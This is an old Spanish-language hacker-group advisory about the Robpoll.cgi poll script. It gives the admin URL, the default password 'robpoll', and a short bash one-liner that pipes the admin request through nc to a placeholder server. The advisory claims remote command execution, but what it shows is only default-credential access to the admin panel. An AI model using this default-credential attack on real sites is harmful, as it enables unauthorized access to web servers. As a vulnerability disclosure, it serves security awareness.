=============================================================================
--------------------------------------------------------------------------05-
-----( Robpoll.cgi Bug )-----------------------------------------------RM-11]
-----[ alt3kx_H3z ]----------------------------[alt3kx_h3z@raza-mexicana.org]


Software: 	Robpoll.cgi
Plataformas:    Unix, NT
Tipo:           CGI, Cambio de contrase~as


Problema:  Cualquiera puede ejecutar comandos en el sistema remoto con los
           privilegios del web server. Cualquiera puede leer cualquier
           archivo que tenga los privilegios de lectura del webserver.

Vulnerabilidad:

Robpoll un programa de administracion gratuito via CGI. Estuve jugando con el
CGI y descubri que la funcion 'admin' esta puesta por default con la
contrase~a  "robpoll":

 1: Add New Question
 2: Remove Question
 3: Change Password      <-- aqui esta el bug

Hay una funcion para el administrador para agregar o remover preguntas,
el cual se hace desde robpoll.cgi, como lo dice en poll.html.

La seccion de administracion esta protegido por password. El password por
default es "robpoll", puedes cambiarlo con una de las funciones del admin.

Estos son los archivos que deberias tener:

  1.  robpoll.cgi  . . . . . . the main Perl script
  2.  pollssi.cgi  . . . . . . the Perl script for SSI
  3.  poll.html  . . . . . . . sample html file
  4.  data.txt . . . . . . . . main data file
  5.  q1.txt . . . . . . . . . question data
  6.  ip1.txt  . . . . . . . . ip data
  7.  num.txt  . . . . . . . . data
  8.  white.jpg  . . . . . . . image for graphing
  9.  robpoll.jpg  . . . . . . link image
  10. readme.txt . . . . . . . this file

Exploit:

(1) robpoll.cgi -

        http://www.victima.com/cgi-bin/robpoll.cgi?Admin

(2) Recibiras un mensaje en html asi:

	1: Add New Question
	2: Remove Question
	3: Change Password

(3) El password por default es "robpoll", si el administrador ha dejado esta
contrase~a, entonces se compromete la seguridad del sistema y sus archivos.

------------------------ CORTAR --------------------

##  		  - Author alt3kx -
##            (www.raza-mexicana.org)
##
##
#!/bin/bash
echo -e "GET http://www.example.com/cgi-bin/robpoll.cgi?Admin
HTTP/1.0\n\n" | nc xxx.server.com 80


------------------------ CORTAR --------------------

Saludos a: Packet Storm y Ken, ADM crew, dr_fdisk^(k00l friend),
           Raregazz, X-ploit, _0x90_ (next work!).
           Radikall (gracias por el trabajo!).
